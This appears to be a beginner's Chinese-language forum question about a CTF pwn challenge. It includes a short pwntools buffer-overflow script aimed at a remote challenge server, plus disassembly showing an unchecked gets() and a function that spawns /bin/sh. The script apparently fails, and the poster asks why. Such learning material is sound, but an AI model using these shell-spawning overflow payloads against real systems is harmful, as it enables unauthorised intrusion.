from pwn import *
p = remote('47.100.53.148', 10101)
buf_1 = bytes(('a' * 32).encode('utf-8')) + p64(0x4005B6)
p.sendline(buf_1)
p.interactive()
小白第一次做pwn的题目,这是脚本 ,参考了网上的脚本,运行后出现Got EOF while reading in interactive,是脚本有问题呢?
.text:00000000004005B6
.text:00000000004005B6 ; Attributes: bp-based frame
.text:00000000004005B6
.text:00000000004005B6 public bin
.text:00000000004005B6 bin proc near
.text:00000000004005B6 ; __unwind {
.text:00000000004005B6 push rbp
.text:00000000004005B7 mov rbp, rsp
.text:00000000004005BA mov edi, offset command ; "/bin/sh"
.text:00000000004005BF mov eax, 0
.text:00000000004005C4 call _system
.text:00000000004005C9 nop
.text:00000000004005CA pop rbp
.text:00000000004005CB retn
.text:00000000004005CB ; } // starts at 4005B6
.text:00000000004005CB bin endp
.text:00000000004005CB
.text:00000000004005CC
.text:00000000004005CC ; =============== S U B R O U T I N E =======================================
.text:00000000004005CC
.text:00000000004005CC ; Attributes: bp-based frame
.text:00000000004005CC
.text:00000000004005CC ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00000000004005CC public main
.text:00000000004005CC main proc near ; DATA XREF: _start+1D↑o
.text:00000000004005CC
.text:00000000004005CC var_20 = byte ptr -20h
.text:00000000004005CC
.text:00000000004005CC ; __unwind {
.text:00000000004005CC push rbp
.text:00000000004005CD mov rbp, rsp
.text:00000000004005D0 sub rsp, 20h
.text:00000000004005D4 mov edi, offset s ; "Welcome to MCTF, and welcome to ZJPC."
.text:00000000004005D9 call _puts
.text:00000000004005DE lea rax, [rbp+var_20]
.text:00000000004005E2 mov rdi, rax
.text:00000000004005E5 mov eax, 0
.text:00000000004005EA call _gets
.text:00000000004005EF mov edi, offset aCanUHackIn ; "Can u hack in?"
.text:00000000004005F4 call _puts
.text:00000000004005F9 nop
.text:00000000004005FA leave
.text:00000000004005FB retn
.text:00000000004005FB ; } // starts at 4005CC
.text:00000000004005FB main endp
这是反编译的代码,主要部分就是main和bin函数了
有相应的源码吗?